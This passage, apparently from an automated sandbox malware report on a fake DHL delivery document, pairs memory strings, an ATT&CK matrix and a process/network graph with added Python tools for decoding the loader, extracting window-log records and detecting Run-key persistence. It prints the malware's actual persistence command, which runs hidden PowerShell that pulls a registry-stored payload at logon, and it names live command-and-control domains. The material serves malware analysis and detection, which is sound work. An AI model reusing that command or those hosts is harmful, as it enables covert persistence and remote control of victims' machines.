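    r"\s*do\s*\{\s*\$\w+\s*\+=\s*\$\2\[\$\3\]\s*;\s*\$\3\s*\+=\s*(\d+)"
)


def find_decoder(cmdline):
    """Return (function_name, offset, stride), or None if no such decoder is present."""
    m = DECODER_RE.search(cmdline)
    if m is None:
        return None
    return m.group(1), int(m.group(4)), int(m.group(5))


def decode(literal, offset, stride):
    """Equivalent of the PowerShell loop: keep literal[offset], literal[offset+stride], ...
    The loop stops when indexing runs past the end ($null is falsy), which is
    exactly where Python's extended slice stops as well."""
    return literal[offset::stride]


def recover_strings(cmdline):
    """Decode every literal handed to the decoder; '+=' call sites are appended to
    the variable's existing value, as the script itself does."""
    found = find_decoder(cmdline)
    out = OrderedDict()
    if found is None:
        return out
    name, offset, stride = found
    call_re = re.compile(r"\$(\w+)\s*(\+?=)\s*" + re.escape(name) + r"\s+'([^']*)'")
    for var, op, literal in call_re.findall(cmdline):
        piece = decode(literal, offset, stride)
        out[var] = (out.get(var, "") + piece) if op == "+=" else piece
    return out


if __name__ == "__main__":
    print("decoder:", find_decoder(CMDLINE))
    for var, value in recover_strings(CMDLINE).items():
        print(f"${var} = {value!r}")
```

Running it yields `$gildhall = 'net.webclient'`, `$horede = 'mozilla/'`, `$gl = 'tls12'`, `$taw = 'user-agent'`, `$dipolen = '>'` and `$remittable = 'iex'`: a WebClient download over TLS 1.2 with a custom User-Agent header, which matches the powershell.exe connection to planachiever.au:443 in the behavior graph further down. The two regular expressions also work on other samples that use the same loop shape; only the function name and the two constants change.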
Source: msiexec.exe, 0000000E.00000002.2502020632.0000000006C37000.00000004.00000020.00020000.00000000.sdmp, hsGaonspt.dat.14.dr | Binary or memory string: [2025/03/07 12:41:34 Program Manager]
Source: msiexec.exe, 0000000E.00000002.2502020632.0000000006C37000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Managerblic
Source: msiexec.exe, 0000000E.00000002.2502020632.0000000006C37000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Managerc
Source: msiexec.exe, 0000000E.00000002.2502020632.0000000006C37000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager
Source: msiexec.exe, 0000000E.00000002.2502020632.0000000006C37000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Managerd
Source: msiexec.exe, 0000000E.00000002.2502020632.0000000006C37000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Managera
Source: msiexec.exe, 0000000E.00000002.2502020632.0000000006C37000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program ManagerN=8f08
Source: msiexec.exe, 0000000E.00000002.2502020632.0000000006C37000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: [%04i/%02i/%02i %02i:%02i:%02i Program Manager]
Source: msiexec.exe, 0000000E.00000002.2502020632.0000000006C37000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager?
Source: msiexec.exe, 0000000E.00000002.2502020632.0000000006C37000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager_
Source: msiexec.exe, 0000000E.00000002.2502020632.0000000006C37000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager`
Source: msiexec.exe, 0000000E.00000002.2502020632.0000000006C01000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000E.00000002.2502020632.0000000006BC5000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: |Program Manager|
Source: msiexec.exe, 0000000E.00000002.2502020632.0000000006C37000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager=
Source: msiexec.exe, 0000000E.00000002.2502020632.0000000006C37000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Managernown.
Source: msiexec.exe, 0000000E.00000002.2514623930.000000002263C000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: g"Program Manager
Source: msiexec.exe, 0000000E.00000002.2502020632.0000000006C37000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager|
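The strings above are timestamped foreground-window records: `[%04i/%02i/%02i %02i:%02i:%02i Program Manager]` is the template as it sits in the binary, `[2025/03/07 12:41:34 Program Manager]` a filled-in instance found both in msiexec.exe memory and in the dropped hsGaonspt.dat, and fragments such as `Program Managerblic` or `|Program Manager|` are partial copies of the same title. The Python below is an added example, not code from the report or from the sample, for pulling those records out of a raw dump so a dropped log can be turned into an activity timeline without reverse-engineering the rest of its format. The sample blob is constructed: the two Program Manager records copy the page's strings, while the Notepad record, the filler bytes and the out-of-order layout are invented for the example.

```python
import re
from datetime import datetime

# Constructed byte blob standing in for a dump of hsGaonspt.dat or msiexec.exe memory.
# The "Program Manager" records copy strings shown in the report; the Notepad
# record, the filler bytes and the ordering are made up for this example.
SAMPLE_BLOB = (
    b"\x00\x00Program Managerblic\x00"
    b"[2025/03/07 12:43:02 Untitled - Notepad]\r\n"
    b"\x90\x90|Program Manager|\x00"
    b"[2025/03/07 12:41:34 Program Manager]\r\n"
    b"[%04i/%02i/%02i %02i:%02i:%02i Program Manager]\x00"  # the template itself, not a record
    b"[2025/03/07 12:41:58 Program Manager]\r\n"
)

# The template "[%04i/%02i/%02i %02i:%02i:%02i <title>]" once its fields are filled in.
# Working on bytes keeps non-UTF-8 debris around the records from breaking the scan.
RECORD_RE = re.compile(rb"\[(\d{4})/(\d{2})/(\d{2}) (\d{2}):(\d{2}):(\d{2}) ([^\]\r\n]{1,200})\]")


def extract_window_records(blob):
    """Return (timestamp, window_title) pairs in the order they occur in the blob."""
    records = []
    for m in RECORD_RE.finditer(blob):
        stamp = datetime(*(int(x) for x in m.groups()[:6]))
        title = m.group(7).decode("utf-8", errors="replace")
        records.append((stamp, title))
    return records


def activity_window(records):
    """First and last timestamp seen, regardless of where they sit in the file."""
    if not records:
        return None
    stamps = sorted(stamp for stamp, _ in records)
    return stamps[0], stamps[-1]


def titles_by_first_seen(records):
    """Distinct window titles, ordered by when each first came to the foreground."""
    first_seen = {}
    for stamp, title in sorted(records):
        first_seen.setdefault(title, stamp)
    return [title for title, _ in sorted(first_seen.items(), key=lambda kv: kv[1])]


if __name__ == "__main__":
    recs = extract_window_records(SAMPLE_BLOB)
    for stamp, title in sorted(recs):
        print(stamp.isoformat(), title)
    print("active:", activity_window(recs))
    print("windows:", titles_by_first_seen(recs))
```

The template line is skipped automatically because `%04i` is not four digits, and the title group refuses `]`, CR and LF so one malformed record cannot swallow the rest of the file. Only the record header is parsed here; whatever the sample stores between records is left untouched, since the report shows nothing about that part of the format.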
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation (4 times)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation (7 times)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation (5 times)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
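The cmd.exe to reg.exe step recorded above writes the Run value `afbenyt` as REG_EXPAND_SZ. Its data starts with `%pigling%`, an environment variable that Windows does not define, followed by a PowerShell fragment that reads the real payload from `HKCU\Software\abanga62\metanetwork` at logon and ends with `-windowstyle 1` (1 is ProcessWindowStyle.Hidden). Nothing executable is stored in the Run key itself, which is what defeats the naive "Run value points at an odd file" check. The Python below is an added example for triaging process-creation logs (Sysmon event ID 1, EDR command lines); it is not Joe Sandbox or sample code. It parses `reg add` command lines and reports the three traits of this entry: a launcher hidden behind a non-standard `%VAR%`, a registry read inside the value data, and the hidden-window switch. The first sample line is the report's own; the two benign lines are constructed for comparison.

```python
import re

# Constructed process-creation command lines. The first is the cmd.exe line from the
# report above; the other two are made-up benign entries for comparison.
SAMPLE_CMDLINES = [
    r'''"c:\windows\system32\cmd.exe" /c reg add "hkcu\software\microsoft\windows\currentversion\run" /f /v "afbenyt" /t reg_expand_sz /d "%pigling% -windowstyle 1 $kolumners112=(gi 'hkcu:\software\abanga62\').getvalue('metanetwork');%pigling% ($kolumners112)"''',
    r'''"C:\Windows\system32\cmd.exe" /c reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v OneDrive /t REG_SZ /d "C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe /background" /f''',
    r'''reg add "HKCU\Software\Contoso\Widget" /v Version /t REG_SZ /d 1.0 /f''',
]

RUN_KEY_RE = re.compile(
    r"^(hkcu|hkey_current_user|hklm|hkey_local_machine)\\software\\(wow6432node\\)?"
    r"microsoft\\windows\\currentversion\\run(once)?$",
    re.IGNORECASE,
)
ENV_REF_RE = re.compile(r"%([^%\s]+)%")                       # %VAR% expanded only at logon
REG_READ_RE = re.compile(r"hk(?:cu|lm):\\|\.getvalue\(", re.IGNORECASE)  # payload pulled from the registry
HIDDEN_RE = re.compile(r"-w(?:i\w*)?\s+(?:1|h(?:idden)?)\b", re.IGNORECASE)  # -WindowStyle Hidden / 1
# Variables a Run entry legitimately starts with; anything else was set by whoever wrote the entry.
KNOWN_ENV = {
    "systemroot", "windir", "systemdrive", "programfiles", "programfiles(x86)", "programdata",
    "commonprogramfiles", "allusersprofile", "public", "userprofile", "appdata", "localappdata",
    "temp", "tmp", "comspec",
}


def split_windows_args(cmdline):
    """Split on whitespace, keeping double-quoted runs together and dropping the quotes."""
    tokens, cur, quoted = [], [], False
    for ch in cmdline:
        if ch == '"':
            quoted = not quoted
        elif ch.isspace() and not quoted:
            if cur:
                tokens.append("".join(cur))
                cur = []
        else:
            cur.append(ch)
    if cur:
        tokens.append("".join(cur))
    return tokens


def parse_reg_add(cmdline):
    """Pull key, value name, type and data out of a 'reg add' invocation; None if absent."""
    toks = split_windows_args(cmdline)
    low = [t.lower() for t in toks]
    for i in range(len(low) - 2):
        if low[i].rsplit("\\", 1)[-1] in ("reg", "reg.exe") and low[i + 1] == "add":
            entry = {"key": toks[i + 2].strip("\\"), "value": "(Default)", "type": "reg_sz", "data": ""}
            j = i + 3
            while j < len(toks):
                flag = low[j]
                if flag in ("/v", "/t", "/d") and j + 1 < len(toks):
                    entry[{"/v": "value", "/t": "type", "/d": "data"}[flag]] = toks[j + 1]
                    j += 2
                else:
                    j += 1  # /f, /ve, /reg:32 and friends carry nothing we need
            entry["type"] = entry["type"].lower()
            return entry
    return None


def assess_run_persistence(cmdline):
    """Reasons a 'reg add' looks like evasive autorun persistence; empty list = nothing notable."""
    entry = parse_reg_add(cmdline)
    if entry is None or not RUN_KEY_RE.match(entry["key"]):
        return []
    reasons, data = [], entry["data"]
    if entry["type"] == "reg_expand_sz":
        odd = {v for v in ENV_REF_RE.findall(data) if v.lower() not in KNOWN_ENV}
        if odd:
            names = ", ".join(f"%{v}%" for v in sorted(odd))
            reasons.append(f"launcher hidden behind non-standard environment variable(s) {names}; "
                           "resolve them from the user and system Environment keys")
    if REG_READ_RE.search(data):
        reasons.append("Run value reads its payload from another registry key at logon")
    if HIDDEN_RE.search(data):
        reasons.append("asks for a hidden window (-windowstyle 1 / Hidden)")
    return reasons


if __name__ == "__main__":
    for line in SAMPLE_CMDLINES:
        print(parse_reg_add(line)["value"] if parse_reg_add(line) else "(not reg add)",
              assess_run_persistence(line) or "clean")
```

On a live host the follow-up is to resolve `%pigling%` (REG_EXPAND_SZ Run values are expanded against the user's environment at logon, so HKCU\Environment is the first place to look) and to export the `metanetwork` value under HKCU\Software\abanga62, because that value, not the Run key, holds what actually executes. The report names the key only in the command line above, so the example does not assume anything about its contents.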

Stealing of Sensitive Information

Source: Yara match | File source: 0000000E.00000002.2502020632.0000000006C01000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: msiexec.exe PID: 7256, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Roaming\hsGaonspt.dat, type: DROPPED

Remote Access Functionality

Source: Yara match | File source: 0000000E.00000002.2502020632.0000000006C01000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: msiexec.exe PID: 7256, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Roaming\hsGaonspt.dat, type: DROPPED

Mitre Att&ck Matrix (one tactic per line, cells listed top to bottom; bracketed digits are the report's hit badges for matched techniques as rendered, unbracketed entries are unmatched cells of the matrix template)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS
Resource Development: Scripting [1]; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
Execution: Windows Management Instrumentation [1]; Command and Scripting Interpreter [2]; PowerShell [1]; Cron; Launchd; Scheduled Task; Systemd Timers
Persistence: Scripting [1]; Registry Run Keys / Startup Folder [1]; DLL Side-Loading [1]; Login Hook; Network Logon Script; RC Scripts; Startup Items
Privilege Escalation: Process Injection [312]; Registry Run Keys / Startup Folder [1]; DLL Side-Loading [1]; Login Hook; Network Logon Script; RC Scripts; Startup Items
Defense Evasion: Masquerading [1]; Modify Registry [1]; Virtualization/Sandbox Evasion [141]; Process Injection [312]; Obfuscated Files or Information [1]; Software Packing [1]; DLL Side-Loading [1]
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
Discovery: Security Software Discovery [111]; Process Discovery [2]; Virtualization/Sandbox Evasion [141]; Application Window Discovery [1]; File and Directory Discovery [1]; System Information Discovery [12]; Remote System Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
Collection: Archive Collected Data [1]; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture
Command and Control: Encrypted Channel [11]; Ingress Tool Transfer [1]; Non-Application Layer Protocol [2]; Application Layer Protocol [113]; Fallback Channels; Multiband Communication; Commonly Used Port
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
Behavior Graph ID: 1632026 | Sample: awb_post_dhl_delivery_docum... | Startdate: 07/03/2025 | Architecture: WINDOWS | Score: 100

Network indicators attached to the sample node: ortain7histas4.duckdns.org; ortain7histas3.duckdns.org (Uses dynamic DNS services); 3 other IPs or domains
Signatures attached to the sample node: Suricata IDS alerts for network traffic; Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; 6 other signatures

Process tree (bracketed numbers are the graph's created-registry-value / created-file counters as rendered):
  powershell.exe [15]
    signatures: Early bird code injection technique detected; Writes to foreign memory regions; Found suspicious powershell code related to unpacking or dynamic code loading; 2 other signatures
    msiexec.exe [6 8]
      network: ortain7histas1.duckdns.org 192.169.69.26, ports 49722, 49723, 49724 (WOWUS, United States)
      dropped: C:\Users\user\AppData\Roaming\hsGaonspt.dat (data)
      signatures: Hides threads from debuggers
      cmd.exe [1]
        conhost.exe
        reg.exe [1 1]
    conhost.exe
  cmd.exe [1]
    signatures: Suspicious powershell command line found
    powershell.exe [14 23]
      network: planachiever.au 27.124.114.163, ports 443, 49719, 49721 (DREAMSCAPE-AS-AP Dreamscape Networks Limited AU, Australia)
      signatures: Found suspicious powershell code related to unpacking or dynamic code loading
      conhost.exe
    conhost.exe

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.